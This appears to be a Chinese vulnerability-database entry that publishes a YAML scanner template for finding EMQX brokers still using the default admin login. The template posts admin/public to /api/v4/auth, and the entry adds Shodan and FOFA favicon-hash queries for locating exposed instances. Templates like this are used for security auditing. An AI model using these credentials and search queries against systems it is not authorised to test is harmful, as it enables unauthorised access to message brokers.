emqx-default-login: Emqx Default Admin Login

日期: 2025-09-01 | 影响软件: Emqx | POC: 已公开

漏洞描述

Emqx default admin credentials were discovered. SHODAN: http.favicon.hash:"-670975485" FOFA: icon_hash="-670975485"

PoC代码[已公开]

id: emqx-default-login

info:
  name: Emqx Default Admin Login
  author: For3stCo1d
  severity: high
  verifed: true
  description: |
    Emqx default admin credentials were discovered.
    SHODAN: http.favicon.hash:"-670975485"
    FOFA: icon_hash="-670975485"
  tags: emqx,default-login
  created: 2023/06/24

rules:
  r0:
    request:
      method: POST
      path: /api/v4/auth
      body: |
        {"username":"admin","password":"public"}
    expression: |
      response.status == 200 && 
      response.body == bytes("{\"code\":0}")
expression: r0()

相关漏洞推荐